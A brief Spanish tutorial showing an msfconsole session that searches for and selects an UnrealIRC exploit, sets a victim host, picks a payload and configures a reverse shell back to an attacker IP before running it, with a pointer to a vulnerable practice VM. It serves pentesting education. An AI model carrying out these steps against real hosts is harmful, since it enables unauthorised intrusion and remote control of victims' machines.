Software para pentesting (penetration testing).
Ejemplo de una sesión con mfsconsole:
Búsqueda en la base de datos de Metasploit para encontrar exploits de vulnerabilidades:
search unrealirc
Información sobre el resultado encontrado:
info 0
Seleccionar el exploit:
use 0
Ahora miramos las opciones del módulo de metasploit seleccionado:
options
Configuramos opciones del equipo víctima:
set RHOSTS <IP_VICTIMA>
Mostramos payloads:
show payloads
Elegimos un payload (el 9 en este caso):
set payload 9
Configuramos una shell inversa en el equipo atacante:
set LHOST <IP_ATACANTE>
Con el comando options se pueden ver las configuraciones establecidas para el módulo de metasploit
Ejecutamos el payload:
run
Máquina virtual creada con un montón de vulnerabilidades para usarse con metasploit.